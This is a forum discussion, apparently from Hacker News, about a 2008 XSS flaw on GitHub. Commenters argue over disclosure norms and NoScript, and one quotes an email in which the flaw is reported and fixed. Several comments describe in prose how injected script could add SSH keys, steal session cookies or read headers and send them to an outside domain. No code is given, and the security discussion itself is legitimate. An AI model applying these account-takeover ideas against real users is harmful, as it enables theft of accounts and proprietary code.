This might look really funny, but consider this: The javascript you are executing there runs on the github domain. So it can do whatever you can do by manually clicking.
The injected script could for example submit a new SSH public key for your account (doesn't require your password again). Or just be funny and delete repos. Or just upgrading your account to a bigger, more expensive plan.
Or they could get a list of your private repositories. Combine that with the upload of a new private key and you'll get free access to proprietary code of any account.
Aside of fixing the XSS issue, they really should ask for the password again when uploading a public key.
They should be able to look at their database to determine if anyone else has has used this method to inject arbitrary html into a page in the past.
They should then put up a notice on their website to describe what happened, describe how they confirmed that this flaw hasn't been exploited previously, and describe what measures they will take in future to prevent this sort of problem.
In my opinion, that is how a "good", company would react. Anything less would be a disappointment.
|In my opinion, that is how a "good", company would react.
This is (more or less) how Github has reacted to security issues in the past. However, at the moment this seems to be a fairly small exploit, that wasn't aggressively used by any would-be exploiters. I definitely don't think github should put up a notice for this.
Would you really want to be alerted every time a website you used closed a minor security hole, that had possibly never even affected anyone? They absolutely should, if any user information was leaked, or if there was downtime involved, but you honestly do not need to keep informing users about this sort of mundane security update. At best, I would suggest it go on their blog.
Not reporting "oh we found an xss hole that maybe one or two people had used before." is NOT a disappointment.
> that wasn't aggressively used by any would-be exploiters.
Doesn't matter. A response shouldn't be measured according to how widely a security hole was exploited, it should always be responded to with full information and transparency.
I expect good software developers to report all buffer overflows that they fix, regardless of whether or not they know of any active exploits. So yes, I expect good website admins to do the same with XSS.
Noscript uses a sledgehammer to do a scalpel's job. It would be much more widely used if it was a little more subtle, and less noticeable as most browser extensions are. Scorched Earth-like blocking is safe, but it very strongly degrades the web surfing experience. I would much rather they use a heuristics-based approach to warn users when potentially malicious scripts were trying to run, than simply block all scripts. I used it for a couple years, but stopped when I realized how annoying it made my browsing experience.
You do realize that NoScript is not "block all scripts", right?
I see so many people criticizing it with no apparent experience or use of it, and this is the primary misconception I see. It is not block all scripts. Why would anyone need an extension for that? You just turn off Javascript in the preferences for that. What it is is a domain-by-domain whitelister.
I can't use Chrome because it doesn't have NoScript, and I end up routinely visiting domains that I didn't even realize have some foreign-loaded script that pops up some crappy survey over the page ("please give us your private info under the guise of providing site feedback we intend to ignore!"), or pops up a flash ad, or who knows what. The web is too irritating to use anymore without it. (And Flashblock.)
Also, NoScripts does have heuristics, but they can't catch already-in-the-page XSS without firing too many false positives. They do have some decent protection against hostile links that have XSS-inducing strings in a query string or something. You can in fact download NoScript and configure it just for that. Personally, I've never had anything but a false positive from that check, but I don't cruise fora where such links are common.
It isn't anywhere near as hard to use as the critics say it is. I know this because I use it on three systems and I don't even bother trying to synchronize the settings somehow; it's more work to synchronize the settings that just use it in all three places.
> I can't use Chrome because it doesn't have NoScript, and I end up routinely visiting domains that I didn't even realize have some foreign-loaded script that pops up some crappy survey over the page ("please give us your private info under the guise of providing site feedback we intend to ignore!"), or pops up a flash ad, or who knows what. The web is too irritating to use anymore without it. (And Flashblock.)
> You do realize that NoScript is not "block all scripts", right?
Actually, I didn't. You do realize that the name "NoScript" implies NO SCRIPTS, right? It shouldn't be surprising that many people think it makes your browser execute "no scripts".
noscript + flashblock + adblock give me a faster browsing experience too. I do disable adblock on nytimes, reddit, google and any other site which provides good content so that it keeps on getting revenue from ads.
It's funny how when you mention NoScript in the presence of web "2.0" developers, most hate it, but if you mention it in the presence of sysadmins, network admins, security bods, general techies, they love it.
You know, having used the web extensively since JavaScript was called LiveScript, I've never had a security issue where blocking JavaScript would have helped. Plugins, yes, using IE and ActiveX a thousand times yes but the only problems JavaScript has caused have been annoyances like ads.
The reason is simple: JavaScript actually has a security model and browsers are one of the few bits of software with widely used update systems; plugins and most other applications are much easier targets (all of that juicy native code not coded defensively) and drift horribly out of date.
So, yes, put me firmly on the list of people who find NoScript 70% PR, 20% clunk UI, and 10% meaningful improvement. Something like Chrome's sandbox and click-to-play will actually make a noticeable benefit for the web because it'll actually be used - and even that's somewhat minor since we're still losing the user education battle where most exploits are actively assisted by the user.
Are you sure you fully understand XSS? The whole problem with XSS is that it works within the browser's security model. Sandboxing is a totally separate issue.
The vast majority of modern websites use JavaScript for trivial purposes. Like adding advertising, or auto focusing on fields. Most of them still work fine without JavaScript.
Some bits of github don't work unless you enable JavaScript, but most of it does. So I only enable it when I'm using those bits.
I also make sure I log out of github before I start browsing other websites.
With noscript, browsing still works fine, you just have to explicitly allow the javascript you want/need rather than allowing just any site to execute code in your browser.
No, even when you do allow a site to run JS, NoScript includes additional XSS, XSRF, and "click-jacking" protections that aren't normally offered by Firefox.
noscript is per-source, so you can whitelist their <script> blocks and jquery.js, but that random javascript in an onmouseover in a forum comment will do nothing.
Maybe it's been a while, but I thought that NoScript was per-domain. In the event of a XSS, the javascript maybe included from the page's domain. NoScript wouldn't help you here. IIRC, NoScript wouldn't say, "Hey this script wasn't here the last time you visited this domain, do you want to allow it?"
The main gain is that you no longer have to worry about getting hit by this class of attack whilst browsing as normal. XSS attacks are happening all the time, even on major websites run by extremely clever techies. You think that is very little gain. To me, that gain is worth the hassle of having to manage NoScript. There is also a positive secondary benefit in that most websites which don't require js to work will run a little faster with NoScript enabled.
You might be right. I was personally hit by a Twitter XSS once. The only reason I enabled JavaScript on twitter.com was because you can't post (or at least couldn't) post new items without enabling it first.
I don't use the twitter.com website any more. Prefering to use clients that don't run JavaScript. Whenever I can use something other than a web browser to access a service, I will take that path. I use NoScript when that isn't an option.
I also found (and reported responsibly) an XSRF flaw in Linode.com a few months back that I believe has now been fixed. That was quite a dangerous one. I also found an XSS flaw in DuckDuckGo a few weeks back. Maybe this is the reason I'm so "paranoid" about JavaScript. Maybe I'm right to be.
A nice POC would have been to write some XSS code which adds your SSH key to a users account if they're logged in when viewing the XSS. I wonder how many HN'ers that would have affected, and git repositories that would have exploited.
I don't think it is an exageration to say that an XSS flaw on something like github has the potential to be disasterous.
XSS trivially compromises your cookie. If I have your cookie, I am you. Demonstrating cute ways to do things that I could just do by logging in as you is superfluous.
Even doing that as a prank would cause a Big Red Button security audit at some companies. As in, drop what you're doing, we need to go over every line of every commit in the git repo and verify nothing like a server password was committed. Recommendation #1 from that audit will be to stop using github.
> Even doing that as a prank would cause a Big Red Button security audit at some companies. As in, drop what you're doing, we need to go over every line of every commit in the git repo and verify nothing like a server password was committed. Recommendation #1 from that audit will be to stop using github.
We know that the two scenarios (ssh key injection as a prank and what happened here as a prank) are equivalent.
If a company reacts like that in your scenario but doesn't do the same after what really happened, they're doing something very wrong.
I wouldn't trust that, since there are many paths to the cheese besides document.cookie. For example, Firefox (IIRC) will let Javascript inspect all headers from an Ajax request. The cookie is just another string there...
Is that actually possible, or are you just pondering that it might be? If Firefox lets you access the raw HTTP Cookie header of a http-only cookie via AJAX, I would consider that a security bug, and report it...
I may take out 10 minutes to have a play with that later if nobody else checks first...
I have personal knowledge that it was possible in 2007. I don't keep abreast of developments in browser security that make them more secure: unlike, say, Thomas and the geniuses at Matasano, all I need to know is the worst possible consequence of whatever our wonderful outsourcing partners dreamed up this time. XSS was one step below server-side code execution on our severity scale.
The big security hole, as alluded to above, is that Firefox (and presumably Opera) allow access to the headers through XMLHttpObject. So you could make a trivial JavaScript call back to the local server, get the headers out of the string, and then post that back to an external domain. Not as easy as document.cookie, but hardly a feat of software engineering.
Totally academic debate. HttpOnly is a band-aid; being able to inject Javascript still lets me do almost anything that I'd ever want to do with that cookie in the future.
That actually sounds like an awful way to report an XSS. Honestly, as someone that maintains a web service I have to say I'd prefer private disclosure than even the rickroll approach. All it takes is one "genius" doing some copy-paste action and then you're in a world of hurt and damage control.
Regarding this and the other response to me. I would never do what I described. I was just trying to demonstrate to those that don't understand XSS properly, that these issues are serious. I don't think a Rick Rolling really gets that issue across.
If I do an XSS attack against you on github whilst you are logged in, I can compromise all of your source repositories, your code, and in turn, potentially compromise the systems of your users.
Yes, soon after posting I realised it wasn't the best idea I've ever had. I regret posting this before the Github guys got a chance to fix the hole. Not something I'm going to repeat.
Righteous indignation? You defaced their site. The least you can do is say, "hey, I fucked up your site, here's how". Otherwise you are basically a 4chan script kiddie.
since you were so incensed by my irresponsible, unethical, and down-right evil behavior, that you saw fit to call me a 4chan script kiddie (horrors!), just thought you'd like to know:
From: "Chris Wanstrath" <chris@redacted.org>
To: mml
Subject: Re: security hole
In-Reply-To: <0228F552-5269-4F44-9D77- 82F077DE2242@redacted.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <0228F552-5269-4F44-9D77-82F077DE2242@mml>
Thanks, fixed!
On Wed, Mar 26, 2008 at 3:54 PM, <mml> wrote:
> hi,
>
> github needs to clean up it's xss act:
>
>
> http://github.com/redacted
>
>
> -mml
--
Chris Wanstrath
http://github.com/defunkt
I don't really care, I just took exception to your use of the expression "righteous indignation". By default, people are friends here, and the person who you replied to was a little surprised that you would just mess with github with no intent to help them fix it. You wouldn't go into your friend's living room, shit all over it, and leave, right? People read your post and were a little surprised that you would do the equivalent to github. (Maybe you didn't, but your tone conveyed that you did.)
The injected script could for example submit a new SSH public key for your account (doesn't require your password again). Or just be funny and delete repos. Or just upgrading your account to a bigger, more expensive plan.
Or they could get a list of your private repositories. Combine that with the upload of a new private key and you'll get free access to proprietary code of any account.
Aside of fixing the XSS issue, they really should ask for the password again when uploading a public key.